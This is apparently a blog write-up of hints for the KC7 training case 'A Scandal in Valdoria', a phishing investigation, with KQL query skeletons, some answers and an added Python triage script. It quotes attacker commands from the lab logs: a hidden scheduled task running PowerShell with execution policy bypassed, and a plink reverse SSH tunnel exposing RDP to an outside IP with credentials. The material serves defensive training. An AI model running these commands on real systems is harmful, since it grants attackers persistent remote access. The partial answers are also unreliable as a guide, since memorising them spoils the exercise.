This post is a write-up with clues on how to resolve the KC7 investigation case A Scandal in Valdoria - Section 3: Plenty of Phish. You can use it as a guide when you get stuck, as it is structured as a fill-in-the-blanks solution: the table names, fields and operators are left for you to work out.
Section 3: Plenty of Phish
Question 1: What is Sonia’s job role?
Table
| where <field> <operator> "Sonia Gose"
Question 2: What email address was used to send this email?
Type the email address newspaper_jobs@gmail.com.
Question 3: When was the email sent to Sonia Gose? Enter the exact timestamp from the logs.
The sender's email address comes from question 2, and Sonia Gose's own email address comes from the Employee table (the same lookup as question 1). Filter the email table on both:
Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">
Question 4: What URL was included in the email?
The query from question 3 already returns it: the URL is in the same email row, so read it from the link column of that result.
Question 5: What is Sonia Gose’s IP address?
Same lookup as question 1: the Employee table row for Sonia Gose also carries her IP address.
Table
| where <field> <operator> "Sonia Gose"
Question 6: Did Sonia click on this link? If so, enter the timestamp when she clicked the link. If not, type “no”
Table
| where <field> <operator> <Sonia Gose's IP address>
and <field> <operator> <URL> //Q4
Question 7: What was the name of the docx file in link that Sonia clicked?
Just the file name, not the full link from the answer to question 4. It is the last path segment of that URL.
Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">
Question 8: What is Sonia Gose’s hostname?
Table
| where <field> <operator> "Sonia Gose"
Question 9: When did the downloaded docx file first show up on Sonia’s machine?
Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7
Question 10: What was the full path of the docx file that was downloaded to Sonia’s machine?
Answer from question 9.
Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7
Question 11: What is the sha256 hash of the file that Sonia downloaded?
Answer from question 9.
Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7
Question 12: What is the name of the file (.ps1) that was written to disk immediately after the docx was downloaded?
Only the file name.
Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000) // only events after the docx was written (question 9)
Question 13: When was this new file created?
Timestamp from answer to question 12.
Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000)
Question 14: Let’s do some research! What type of file is this?
Use your Google-Fu skills!
Question 15: What does the attacker say to “let you know they are here”?
Lol! Do you see it 😄.
Question 16: According to the PowerShell script, what might be the hacker’s favorite color?
It is in the image from question 15.
Question 17: The purpose of the script is to invoke ____ and uncover da truth
It is in the image from question 15.
Question 18: How many Process Events are there related to this PowerShell script on Sonia’s machine?
Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"
| count
Question 19: What is the full command used to create the scheduled task?
It is one of the process events returned by the question 18 query: look for the schtasks invocation, the Windows command-line way of creating a Task Scheduler task.
Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"
Question 20: What ExecutionPolicy is set in the command?
The policy will allow the script to run without restrictions.
This command uses schtasks to create a scheduled task in Windows. Here is a breakdown of the command and what each part does:
schtasks: the Windows command-line tool used to create, delete, query, change, run and end scheduled tasks on a local or remote computer.
/create: tells schtasks that you want to create a new scheduled task.
/sc hourly: specifies the schedule type for the task. Here, hourly means the task runs on an hourly schedule.
/mo 5: the modifier for the schedule set by /sc. Combined with hourly, it means the task runs every 5 hours.
/tn "Hacktivist Manifesto": sets the name of the task. The task is identified in Task Scheduler as "Hacktivist Manifesto".
/tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1": sets the action that the task executes. Here it runs powershell.exe with the following parameters:
-ExecutionPolicy Bypass: bypasses the PowerShell execution policy, so the script runs regardless of the policy configured on the machine. Keep in mind that execution policy is a safeguard against running scripts by accident, not a security boundary, which is exactly why an attacker can switch it off per invocation like this.
-File C:\ProgramData\hacktivist_manifesto.ps1: the path to the PowerShell script that should be executed.
In summary, this command creates a scheduled task named "Hacktivist Manifesto" that runs the PowerShell script at C:\ProgramData\hacktivist_manifesto.ps1 every 5 hours, bypassing any execution policy restrictions. Because the full command line, including the /tr action, is recorded in the process event, the script path and the execution policy both come straight out of that one log row.
Question 21: What IP address is used when plink is executed?
ProcessEvents
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "plink.exe"
plink.exe is the command-line interface to the PuTTY back ends, i.e. the command-line PuTTY SSH client. Here is a breakdown of the command:
-R 3389:localhost:3389: sets up a reverse (remote) SSH tunnel. -R requests remote port forwarding, and 3389:localhost:3389 asks the SSH server (the attacker's machine) to listen on port 3389 and forward every connection to it back through the tunnel to localhost:3389 on Sonia's machine. Port 3389 is the Remote Desktop Protocol (RDP) port.
-ssh: tells plink.exe to use the SSH protocol for the connection.
-l $had0w: the username to log in as on the remote machine, here $had0w.
-pw thruthW!llS3tUfree: the password for the user $had0w. Passing it with -pw puts it on the command line, which is why it is sitting in plain text in the process event.
136.130.190.181: the IP address of the remote machine being connected to.
This command sets up a reverse SSH tunnel from Sonia's machine to the attacker's server at 136.130.190.181, authenticating as $had0w with the password thruthW!llS3tUfree. Port 3389 on the remote machine is forwarded to port 3389 on the local machine, so the attacker can reach the Remote Desktop service on Sonia's machine by pointing an RDP client at their own server's port 3389. Essentially, the victim's desktop is exposed through an outbound SSH connection, which needs no inbound firewall opening on the victim side.
Question 22: What username did the attacker use when connecting via plink?
Answer from question 21.
Question 23: What password did the attacker use when connecting via plink?
Answer from question 21.
Question 24: What six-letter command did the attackers run to figure out which user they are logged on as on the computer?
The timestamp from answer question 21.
ProcessEvents
| where hostname == "<Sonia Gose's Hostname>"
| where timestamp >= datetime(2024-01-06 02:39:35)
Question 25: How many discovery commands did the attackers run on this machine?
Use the query from question 24 and count the commands that follow the plink execution. For what counts as discovery, check the MITRE ATT&CK Discovery tactic (TA0007); T1018, Remote System Discovery, is one of its techniques.
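To tie questions 19 to 25 together, here is an added example that is my code, not KC7's and not part of the original write-up: it parses the schtasks and plink command lines dissected above and triages a handful of ProcessEvents-style rows, tagging persistence, the reverse tunnel and the discovery commands. The row layout (timestamp, process name, command line), the tokenizer and the list of discovery executables are assumptions; the command lines are the ones quoted above and the sample rows are constructed.

```python
"""Added example (not KC7's or the original author's code): parse the schtasks and
plink command lines dissected in the write-up and triage ProcessEvents-style rows.
Row layout, tokenizer and discovery list are assumptions; the command lines are the
ones quoted in the write-up; the sample rows are constructed."""
import re

# Constructed sample rows: (timestamp, process_name, process_commandline).
SAMPLE_EVENTS = [
    ("2024-01-05 10:24:06", "schtasks.exe",
     r'schtasks /create /sc hourly /mo 5 /tn "Hacktivist Manifesto" '
     r'/tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1"'),
    ("2024-01-06 02:39:35", "plink.exe",
     "plink.exe -R 3389:localhost:3389 -ssh -l $had0w -pw thruthW!llS3tUfree 136.130.190.181"),
    ("2024-01-06 02:40:01", "whoami.exe", "whoami"),
    ("2024-01-06 02:40:30", "net.exe", "net user"),
    ("2024-01-06 02:41:02", "ipconfig.exe", "ipconfig /all"),
]
TOKEN_RE = re.compile(r'"[^"]*"|\S+')
PLINK_OPTS_WITH_ARG = {"-L", "-R", "-D", "-l", "-pw", "-pwfile", "-P", "-i", "-m", "-hostkey"}
DISCOVERY_EXES = {"whoami", "net", "net1", "ipconfig", "systeminfo", "hostname", "nltest",
                  "tasklist", "quser", "arp", "netstat", "nslookup", "route"}  # assumed list

def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping "quoted spans" whole, quotes removed."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]

def exe_name(token):
    """'C:\\Windows\\System32\\schtasks.exe' -> 'schtasks' (path and .exe dropped, lower-cased)."""
    name = token.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def parse_schtasks(cmdline):
    """Return schtasks /switches as {switch: value or True}, or None if this is not schtasks."""
    toks = tokenize(cmdline)
    if not toks or exe_name(toks[0]) != "schtasks":
        return None
    switches, i = {}, 1
    while i < len(toks):
        if toks[i].startswith("/"):
            key = toks[i][1:].lower()
            has_value = i + 1 < len(toks) and not toks[i + 1].startswith("/")
            switches[key] = toks[i + 1] if has_value else True  # /create takes no value
            i += 2 if has_value else 1
        else:
            i += 1
    return switches

def parse_powershell_action(action):
    """Pull -ExecutionPolicy and -File out of a powershell.exe command line."""
    toks = tokenize(action)
    out = {"execution_policy": None, "file": None}
    for i in range(1, len(toks) - 1):
        key = toks[i][1:].lower() if toks[i].startswith("-") else ""
        # powershell.exe accepts unambiguous prefixes (-exec, -ex) plus the -ep alias
        if key == "ep" or (len(key) >= 2 and "executionpolicy".startswith(key)):
            out["execution_policy"] = toks[i + 1]
        elif key and "file".startswith(key):
            out["file"] = toks[i + 1]
    return out

def parse_plink(cmdline):
    """Extract target, credentials and -R forwards from a plink command line."""
    toks = tokenize(cmdline)
    if not toks or exe_name(toks[0]) != "plink":
        return None
    info = {"host": None, "user": None, "password": None, "remote_forwards": []}
    i = 1
    while i < len(toks):
        tok = toks[i]
        if tok in PLINK_OPTS_WITH_ARG and i + 1 < len(toks):  # plink options are case-sensitive
            val = toks[i + 1]
            if tok == "-l":
                info["user"] = val
            elif tok == "-pw":
                info["password"] = val  # on the command line, hence in the process event
            elif tok == "-R":  # [listen_addr:]listen_port:dest_host:dest_port, listener on the SSH server
                parts = val.split(":")
                info["remote_forwards"].append((parts[-3], parts[-2], parts[-1]))
            i += 2
            continue
        if not tok.startswith("-") and info["host"] is None:  # first positional is [user@]host
            user, _, info["host"] = tok.rpartition("@")
            info["user"] = user or info["user"]
        i += 1  # -ssh, -N, -batch, ... take no argument; later positionals are a remote command
    return info

def triage(events):
    """Tag rows as scheduled_task (schtasks /create), reverse_tunnel (plink -R) or discovery."""
    findings = []
    for ts, proc, cmd in events:
        task, tunnel = parse_schtasks(cmd), parse_plink(cmd)
        if task and "create" in task:
            ps = parse_powershell_action(task["tr"]) if isinstance(task.get("tr"), str) else {}
            findings.append((ts, "scheduled_task", {"task": task.get("tn"),
                             "schedule": f"/sc {task.get('sc')} /mo {task.get('mo')}", **ps}))
        elif tunnel and tunnel["remote_forwards"]:
            findings.append((ts, "reverse_tunnel", tunnel))
        elif exe_name(proc) in DISCOVERY_EXES:
            findings.append((ts, "discovery", {"command": cmd}))
    return findings

def discovery_count(events):
    """How many discovery commands ran (the shape of question 25)."""
    return sum(1 for _, cat, _ in triage(events) if cat == "discovery")
```

Call triage(SAMPLE_EVENTS) and you get one scheduled_task finding carrying the task name, schedule, execution policy and script path, one reverse_tunnel finding carrying the host, username and password, and one discovery finding per whoami/net/ipconfig row; discovery_count(SAMPLE_EVENTS) is 3. The takeaway is that everything these questions ask for sits in the command line field of a single process creation event, which is why full command-line logging matters and why a rule on schtasks /create whose /tr action carries -ExecutionPolicy Bypass, or on plink with -R, is cheap and high-signal.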
Question 26: Do you think we can safely stop our investigation here? (yes/no)
🤔
Community Help
Join the KC7 Discord (#valdoria) to discuss the module.